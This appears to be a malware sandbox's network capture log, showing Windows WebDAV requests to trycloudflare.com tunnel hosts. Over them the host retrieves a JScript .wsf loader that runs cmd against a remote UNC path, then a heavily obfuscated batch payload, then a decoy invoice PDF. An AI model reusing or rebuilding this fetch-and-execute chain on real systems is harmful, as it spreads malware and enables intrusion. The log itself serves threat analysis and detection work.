            2025-03-13 10:07:37 UTC212OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 63 6f 69 2e 77 73 66 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND /coi.wsf HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:37 UTC228INHTTP/1.1 207 Multi-Status
            Date: Thu, 13 Mar 2025 10:07:37 GMT
            Content-Type: application/xml; charset=utf-8
            Content-Length: 836
            Connection: close
            CF-Ray: 91fab9b42d94a918-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:37 UTC836INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 63 6f 69 2e 77 73 66 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 35 2d 30 33 2d 31 31 54 32 33 3a 31 30 3a 30 31 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 33 38 33 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68
            Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/coi.wsf</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:creationdate>2025-03-11T23:10:01Z</D:creationdate><D:getcontentlength>383</D:getcontentlength


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.1049691104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:39 UTC221OUTGET /coi.wsf HTTP/1.1
            Cache-Control: no-cache
            Connection: Keep-Alive
            Pragma: no-cache
            User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
            translate: f
            Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:40 UTC337INHTTP/1.1 200 OK
            Date: Thu, 13 Mar 2025 10:07:40 GMT
            Content-Type: application/octet-stream
            Content-Length: 383
            Connection: close
            CF-Ray: 91fab9c2c9fff02e-DFW
            CF-Cache-Status: DYNAMIC
            Accept-Ranges: bytes
            ETag: "480eedf80857d90a40c3e0ee7c0a3615-1741734587-383"
            Last-Modified: Tue, 11 Mar 2025 23:09:47 GMT
            Server: cloudflare
            2025-03-13 10:07:40 UTC383INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 6a 6f 62 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 5b 43 44 41 54 41 5b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 68 65 6c 6c 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 68 65 6c 6c 2e 52 75 6e 28 22 63 6d 64 20 2f 63 20 5c 5c 5c 5c 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><job> <script language="JScript"> <![CDATA[ var shell = new ActiveXObject("WScript.Shell"); try { shell.Run("cmd /c \\\\typically-nut-personalized-syndication.trycloudfla


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.1049694104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:42 UTC211OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 78 6f 2e 62 61 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND /xo.bat HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:43 UTC228INHTTP/1.1 207 Multi-Status
            Date: Thu, 13 Mar 2025 10:07:43 GMT
            Content-Type: application/xml; charset=utf-8
            Content-Length: 824
            Connection: close
            CF-Ray: 91fab9d57c0e4683-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:43 UTC824INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 78 6f 2e 62 61 74 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 35 2d 30 33 2d 31 31 54 32 33 3a 30 39 3a 31 30 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 33 36 32 31 36 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74
            Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/xo.bat</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:creationdate>2025-03-11T23:09:10Z</D:creationdate><D:getcontentlength>36216</D:getcontentlengt


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.1049698104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:44 UTC220OUTGET /xo.bat HTTP/1.1
            Cache-Control: no-cache
            Connection: Keep-Alive
            Pragma: no-cache
            User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
            translate: f
            Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:45 UTC327INHTTP/1.1 200 OK
            Date: Thu, 13 Mar 2025 10:07:45 GMT
            Content-Type: text/plain
            Content-Length: 36216
            Connection: close
            CF-Ray: 91fab9e3dbcb3588-DFW
            CF-Cache-Status: DYNAMIC
            Accept-Ranges: bytes
            ETag: "4ec843a81109410ea7c4aa655b11ef03-1741734530-36216"
            Last-Modified: Tue, 11 Mar 2025 23:08:50 GMT
            Server: cloudflare
            2025-03-13 10:07:45 UTC1369INData Raw: ff fe 26 40 63 6c 73 26 40 73 65 74 20 22 c3 6c c3 4c 3d 77 59 35 6e 33 32 6f 45 44 68 57 43 41 61 54 7a 36 67 63 49 6b 38 76 20 73 75 58 4b 56 4c 34 37 39 46 47 31 4f 6d 79 51 70 66 74 65 78 4a 52 62 40 48 64 50 72 71 69 6a 6c 55 4e 53 30 42 4d 5a 22 0a 25 c3 6c c3 4c 3a 7e 34 38 2c 31 25 25 78 53 c3 73 43 c3 42 25 25 c3 6c c3 4c 3a 7e 32 34 2c 31 25 25 85 aa 48 c3 c3 7a c3 25 25 c3 6c c3 4c 3a 7e 34 33 2c 31 25 25 c3 6c c3 4c 3a 7e 34 32 2c 31 25 25 c3 6c c3 4c 3a 7e 32 33 2c 31 25 22 c3 96 b9 25 c3 6c c3 4c 3a 7e 33 36 2c 31 25 c3 3d 25 c3 6c c3 4c 3a 7e 33 34 2c 31 25 25 c3 6c c3 4c 3a 7e 31 34 2c 31 25 25 c3 6c c3 4c 3a 7e 35 35 2c 31 25 25 c3 6c c3 4c 3a 7e 32 38 2c 31 25 25 c3 6c c3 4c 3a 7e 32 34 2c 31 25 25 c3 6c c3 4c 3a 7e 33 30 2c 31 25 25 c3
            Data Ascii: &@cls&@set "lL=wY5n32oEDhWCAaTz6gcIk8v suXKVL479FG1OmyQpftexJRb@HdPrqijlUNS0BMZ"%lL:~48,1%%xSsCB%%lL:~24,1%%Hz%%lL:~43,1%%lL:~42,1%%lL:~23,1%"%lL:~36,1%=%lL:~34,1%%lL:~14,1%%lL:~55,1%%lL:~28,1%%lL:~24,1%%lL:~30,1%%
            2025-03-13 10:07:45 UTC1369INData Raw: b9 4f c3 3a 7e 33 37 2c 31 25 25 c3 96 b9 4f c3 3a 7e 34 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 30 2c 31 25 25 c3 96 b9 4f c3 3a 7e 33 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 34 32 2c 31 25 25 c3 96 b9 4f c3 3a 7e 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 34 30 2c 31 25 25 c3 96 b9 4f c3 3a 7e 39 2c 31 25 25 c3 96 b9 4f c3 3a 7e 34 36 2c 31 25 25 a3 43 a5 c3 a7 89 66 25 25 c3 96 b9 4f c3 3a 7e 34 31 2c 31 25 25 c3 96 b9 4f c3 3a 7e 31 34 2c 31 25 25 c3 96 b9 4f c3 3a 7e 35 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 31 30 2c 31 25 25 c3 96 b9 4f c3 3a 7e 31 32 2c 31 25 25 c3 96 b9 4f c3 3a 7e 35 31 2c 31 25 25 4f 4e 6e a8 85 c3 9c 25 25 c3 96 b9 4f c3 3a 7e 32 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 36 2c 31 25 25 c3 96 b9 4f c3 3a 7e 35 36 2c 31 25 25 c3 c3 c3 4f ab 68 c3 25 25
            Data Ascii: O:~37,1%%O:~48,1%%O:~0,1%%O:~38,1%%O:~42,1%%O:~8,1%%O:~40,1%%O:~9,1%%O:~46,1%%Cf%%O:~41,1%%O:~14,1%%O:~58,1%%O:~10,1%%O:~12,1%%O:~51,1%%ONn%%O:~28,1%%O:~6,1%%O:~56,1%%Oh%%
            2025-03-13 10:07:45 UTC1369INData Raw: 31 25 25 96 49 c3 76 69 3a 7e 34 30 2c 31 25 25 96 49 c3 76 69 3a 7e 32 37 2c 31 25 25 96 49 c3 76 69 3a 7e 35 35 2c 31 25 25 96 49 c3 76 69 3a 7e 35 32 2c 31 25 25 96 49 c3 76 69 3a 7e 31 39 2c 31 25 25 96 49 c3 76 69 3a 7e 31 35 2c 31 25 25 96 49 c3 76 69 3a 7e 32 33 2c 31 25 25 96 49 c3 76 69 3a 7e 31 32 2c 31 25 25 96 49 c3 76 69 3a 7e 35 39 2c 31 25 25 96 49 c3 76 69 3a 7e 33 39 2c 31 25 22 0a 25 c3 af 96 3a 7e 34 33 2c 31 25 25 c3 af 96 3a 7e 34 2c 31 25 25 c3 af 96 3a 7e 31 39 2c 31 25 25 c3 af 96 3a 7e 33 33 2c 31 25 25 c3 af 96 3a 7e 33 31 2c 31 25 22 87 c3 84 c3 25 c3 af 96 3a 7e 36 2c 31 25 25 6a c3 ab 84 c3 47 6c 25 3d 25 c3 af 96 3a 7e 35 35 2c 31 25 25 c3 af 96 3a 7e 35 39 2c 31 25 25 a8 c3 c3 c3 a5 c3 c3 25 25 c3 af 96 3a 7e 31 32 2c 31 25
            Data Ascii: 1%%Ivi:~40,1%%Ivi:~27,1%%Ivi:~55,1%%Ivi:~52,1%%Ivi:~19,1%%Ivi:~15,1%%Ivi:~23,1%%Ivi:~12,1%%Ivi:~59,1%%Ivi:~39,1%"%:~43,1%%:~4,1%%:~19,1%%:~33,1%%:~31,1%"%:~6,1%%jGl%=%:~55,1%%:~59,1%%%%:~12,1%
            2025-03-13 10:07:45 UTC1369INData Raw: 31 25 25 87 c3 84 c3 44 3a 7e 32 30 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 39 2c 31 25 25 87 c3 84 c3 44 3a 7e 35 37 2c 31 25 25 87 c3 84 c3 44 3a 7e 35 33 2c 31 25 25 87 c3 84 c3 44 3a 7e 33 39 2c 31 25 25 87 c3 84 c3 44 3a 7e 32 35 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 37 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 35 2c 31 25 25 87 c3 84 c3 44 3a 7e 36 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 33 2c 31 25 25 87 c3 84 c3 44 3a 7e 31 37 2c 31 25 25 87 c3 84 c3 44 3a 7e 32 38 2c 31 25 25 87 c3 84 c3 44 3a 7e 36 33 2c 31 25 25 87 c3 84 c3 44 3a 7e 32 37 2c 31 25 25 87 c3 84 c3 44 3a 7e 36 32 2c 31 25 25 6c 6b 65 c3 71 53 b2 25 25 87 c3 84 c3 44 3a 7e 38 2c 31 25 25 87 c3 84 c3 44 3a 7e 35 38 2c 31 25 25 87 c3 84 c3 44 3a 7e 31 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 31 2c 31 25
            Data Ascii: 1%%D:~20,1%%D:~49,1%%D:~57,1%%D:~53,1%%D:~39,1%%D:~25,1%%D:~47,1%%D:~45,1%%D:~6,1%%D:~43,1%%D:~17,1%%D:~28,1%%D:~63,1%%D:~27,1%%D:~62,1%%lkeqS%%D:~8,1%%D:~58,1%%D:~1,1%%D:~41,1%
            2025-03-13 10:07:45 UTC1369INData Raw: c3 3a 7e 36 2c 31 25 25 c3 67 ac c3 3a 7e 31 30 2c 31 25 22 0a 25 55 5f 89 3a 7e 33 35 2c 31 25 25 55 5f 89 3a 7e 35 30 2c 31 25 25 55 5f 89 3a 7e 34 31 2c 31 25 25 55 5f 89 3a 7e 35 39 2c 31 25 25 55 5f 89 3a 7e 35 38 2c 31 25 22 25 55 5f 89 3a 7e 35 30 2c 31 25 c3 25 55 5f 89 3a 7e 31 32 2c 31 25 c3 91 3d 25 55 5f 89 3a 7e 33 33 2c 31 25 25 54 62 c3 b6 79 c3 43 25 25 55 5f 89 3a 7e 36 30 2c 31 25 25 55 5f 89 3a 7e 33 34 2c 31 25 25 c3 71 c3 9c 46 89 b2 25 25 55 5f 89 3a 7e 34 37 2c 31 25 25 55 5f 89 3a 7e 35 36 2c 31 25 25 55 5f 89 3a 7e 34 2c 31 25 25 55 5f 89 3a 7e 36 2c 31 25 25 55 5f 89 3a 7e 35 2c 31 25 25 55 5f 89 3a 7e 31 38 2c 31 25 25 55 5f 89 3a 7e 32 31 2c 31 25 25 55 5f 89 3a 7e 38 2c 31 25 25 55 5f 89 3a 7e 36 32 2c 31 25 25 55 5f 89 3a 7e
            Data Ascii: :~6,1%%g:~10,1%"%U_:~35,1%%U_:~50,1%%U_:~41,1%%U_:~59,1%%U_:~58,1%"%U_:~50,1%%U_:~12,1%=%U_:~33,1%%TbyC%%U_:~60,1%%U_:~34,1%%qF%%U_:~47,1%%U_:~56,1%%U_:~4,1%%U_:~6,1%%U_:~5,1%%U_:~18,1%%U_:~21,1%%U_:~8,1%%U_:~62,1%%U_:~
            2025-03-13 10:07:45 UTC1369INData Raw: 73 c3 71 c3 91 3a 7e 31 34 2c 31 25 25 73 c3 71 c3 91 3a 7e 33 35 2c 31 25 25 ab c3 c3 c3 6b c3 c3 25 25 73 c3 71 c3 91 3a 7e 31 31 2c 31 25 25 73 c3 71 c3 91 3a 7e 36 31 2c 31 25 25 73 c3 71 c3 91 3a 7e 35 31 2c 31 25 25 73 c3 71 c3 91 3a 7e 34 36 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 32 2c 31 25 25 73 c3 71 c3 91 3a 7e 33 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 33 2c 31 25 25 73 c3 71 c3 91 3a 7e 35 36 2c 31 25 25 73 c3 71 c3 91 3a 7e 31 35 2c 31 25 25 73 c3 71 c3 91 3a 7e 33 34 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 38 2c 31 25 25 73 c3 71 c3 91 3a 7e 35 2c 31 25 25 73 c3 71 c3 91 3a 7e 35 34 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 36 2c 31 25 25 73 c3 71 c3 91 3a 7e 31 38 2c 31 25 25 73 c3 71 c3 91 3a 7e 36 32 2c 31 25 25 73 c3
            Data Ascii: sq:~14,1%%sq:~35,1%%k%%sq:~11,1%%sq:~61,1%%sq:~51,1%%sq:~46,1%%sq:~2,1%%sq:~22,1%%sq:~3,1%%sq:~23,1%%sq:~56,1%%sq:~15,1%%sq:~34,1%%sq:~28,1%%sq:~5,1%%sq:~54,1%%sq:~26,1%%sq:~18,1%%sq:~62,1%%s
            2025-03-13 10:07:45 UTC1369INData Raw: 7e 33 2c 31 25 25 c3 c3 c3 50 3a 7e 31 38 2c 31 25 25 c3 c3 c3 50 3a 7e 33 34 2c 31 25 25 c3 c3 c3 50 3a 7e 32 33 2c 31 25 25 c3 c3 c3 50 3a 7e 34 38 2c 31 25 22 bb 25 c3 c3 c3 50 3a 7e 31 2c 31 25 25 c3 c3 c3 50 3a 7e 35 37 2c 31 25 b9 25 c3 c3 c3 50 3a 7e 33 37 2c 31 25 3d 25 c3 c3 c3 50 3a 7e 33 39 2c 31 25 25 c3 c3 c3 50 3a 7e 32 37 2c 31 25 25 c3 c3 c3 50 3a 7e 33 34 2c 31 25 25 c3 c3 c3 50 3a 7e 32 31 2c 31 25 25 c3 c3 c3 50 3a 7e 34 38 2c 31 25 25 c3 c3 c3 50 3a 7e 35 35 2c 31 25 25 c3 c3 c3 50 3a 7e 39 2c 31 25 25 c3 c3 c3 50 3a 7e 31 39 2c 31 25 25 c3 c3 c3 50 3a 7e 33 37 2c 31 25 25 9c 49 72 78 63 44 89 25 25 c3 c3 c3 50 3a 7e 34 34 2c 31 25 25 4b ad c3 52 6d 59 4a 25 25 c3 c3 c3 50 3a 7e 34 39 2c 31 25 25 c3 c3 c3 50 3a 7e 32 39 2c 31 25 25 c3
            Data Ascii: ~3,1%%P:~18,1%%P:~34,1%%P:~23,1%%P:~48,1%"%P:~1,1%%P:~57,1%%P:~37,1%=%P:~39,1%%P:~27,1%%P:~34,1%%P:~21,1%%P:~48,1%%P:~55,1%%P:~9,1%%P:~19,1%%P:~37,1%%IrxcD%%P:~44,1%%KRmYJ%%P:~49,1%%P:~29,1%%
            2025-03-13 10:07:45 UTC1369INData Raw: 3a 7e 36 33 2c 31 25 25 bb 41 69 b9 62 3a 7e 30 2c 31 25 25 bb 41 69 b9 62 3a 7e 32 31 2c 31 25 25 bb 41 69 b9 62 3a 7e 32 35 2c 31 25 25 bb 41 69 b9 62 3a 7e 32 32 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 2c 31 25 25 bb 41 69 b9 62 3a 7e 35 32 2c 31 25 25 bb 41 69 b9 62 3a 7e 38 2c 31 25 25 bb 41 69 b9 62 3a 7e 35 38 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 38 2c 31 25 25 55 66 a0 c3 b4 70 75 25 25 bb 41 69 b9 62 3a 7e 35 35 2c 31 25 25 bb 41 69 b9 62 3a 7e 37 2c 31 25 25 bb 41 69 b9 62 3a 7e 33 2c 31 25 25 bb 41 69 b9 62 3a 7e 36 32 2c 31 25 25 bb 41 69 b9 62 3a 7e 33 39 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 30 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 32 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 35 2c 31 25 25 bb 41 69 b9 62 3a 7e 35 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 34 2c
            Data Ascii: :~63,1%%Aib:~0,1%%Aib:~21,1%%Aib:~25,1%%Aib:~22,1%%Aib:~4,1%%Aib:~52,1%%Aib:~8,1%%Aib:~58,1%%Aib:~48,1%%Ufpu%%Aib:~55,1%%Aib:~7,1%%Aib:~3,1%%Aib:~62,1%%Aib:~39,1%%Aib:~40,1%%Aib:~42,1%%Aib:~45,1%%Aib:~5,1%%Aib:~44,
            2025-03-13 10:07:45 UTC1369INData Raw: a8 85 4c a1 a4 3a 7e 36 2c 31 25 25 a8 85 4c a1 a4 3a 7e 34 31 2c 31 25 22 0a 25 58 ad ba 87 3a 7e 31 33 2c 31 25 25 58 ad ba 87 3a 7e 33 33 2c 31 25 25 58 ad ba 87 3a 7e 35 38 2c 31 25 25 58 ad ba 87 3a 7e 31 35 2c 31 25 25 58 ad ba 87 3a 7e 33 30 2c 31 25 22 25 58 ad ba 87 3a 7e 34 30 2c 31 25 c3 ac c3 c3 3d 25 58 ad ba 87 3a 7e 35 2c 31 25 25 58 ad ba 87 3a 7e 32 39 2c 31 25 25 58 ad ba 87 3a 7e 32 34 2c 31 25 25 58 ad ba 87 3a 7e 31 37 2c 31 25 25 58 ad ba 87 3a 7e 33 32 2c 31 25 25 58 ad ba 87 3a 7e 31 36 2c 31 25 25 58 ad ba 87 3a 7e 34 39 2c 31 25 25 58 ad ba 87 3a 7e 34 33 2c 31 25 25 58 ad ba 87 3a 7e 36 31 2c 31 25 25 58 ad ba 87 3a 7e 30 2c 31 25 25 58 ad ba 87 3a 7e 34 32 2c 31 25 25 58 ad ba 87 3a 7e 33 33 2c 31 25 25 58 ad ba 87 3a 7e 34 35
            Data Ascii: L:~6,1%%L:~41,1%"%X:~13,1%%X:~33,1%%X:~58,1%%X:~15,1%%X:~30,1%"%X:~40,1%=%X:~5,1%%X:~29,1%%X:~24,1%%X:~17,1%%X:~32,1%%X:~16,1%%X:~49,1%%X:~43,1%%X:~61,1%%X:~0,1%%X:~42,1%%X:~33,1%%X:~45
            2025-03-13 10:07:45 UTC1369INData Raw: 31 25 25 56 c3 ac c3 c3 3a 7e 32 2c 31 25 25 56 c3 ac c3 c3 3a 7e 33 32 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 33 2c 31 25 25 56 c3 ac c3 c3 3a 7e 34 31 2c 31 25 25 56 c3 ac c3 c3 3a 7e 31 35 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 2c 31 25 25 56 c3 ac c3 c3 3a 7e 34 36 2c 31 25 25 56 c3 ac c3 c3 3a 7e 33 30 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 32 2c 31 25 25 56 c3 ac c3 c3 3a 7e 31 30 2c 31 25 25 56 c3 ac c3 c3 3a 7e 34 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 31 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 37 2c 31 25 25 56 c3 ac c3 c3 3a 7e 34 34 2c 31 25 25 56 c3 ac c3 c3 3a 7e 36 2c 31 25 25 56 c3 ac c3 c3 3a 7e 30 2c 31 25 25 b2 c3 b4 c3 50 a3 bc 25 25 56 c3 ac c3 c3 3a 7e 38 2c 31 25 25 56 c3 ac c3 c3 3a 7e 32 36 2c 31 25 25 56 c3 ac c3 c3 3a 7e 33 38 2c 31 25 25 56 c3
            Data Ascii: 1%%V:~2,1%%V:~32,1%%V:~53,1%%V:~41,1%%V:~15,1%%V:~5,1%%V:~46,1%%V:~30,1%%V:~52,1%%V:~10,1%%V:~4,1%%V:~51,1%%V:~57,1%%V:~44,1%%V:~6,1%%V:~0,1%%P%%V:~8,1%%V:~26,1%%V:~38,1%%V


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.1053106104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:49 UTC162OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
            translate: f
            Host: nissan-signature-rs-noise.trycloudflare.com
            2025-03-13 10:07:49 UTC331INHTTP/1.1 200 OK
            Date: Thu, 13 Mar 2025 10:07:49 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            CF-Ray: 91fab9fd9b50e82b-DFW
            CF-Cache-Status: DYNAMIC
            Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
            dav: 1,2
            ms-author-via: DAV
            Server: cloudflare
            2025-03-13 10:07:49 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.1053114162.159.134.424437752C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:51 UTC726OUTGET /wp-content/uploads/2013/08/draft-invoice-Germany.pdf HTTP/1.1
            Host: www.healyconsultants.com
            Connection: keep-alive
            sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
            sec-ch-ua-mobile: ?0
            sec-ch-ua-platform: "Windows"
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9
            2025-03-13 10:07:51 UTC178INHTTP/1.1 403 Forbidden
            Server: cloudflare
            Date: Thu, 13 Mar 2025 10:07:51 GMT
            Content-Type: text/html
            Content-Length: 553
            Connection: close
            CF-RAY: 91faba0cab9b0c03-DFW
            2025-03-13 10:07:51 UTC553INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
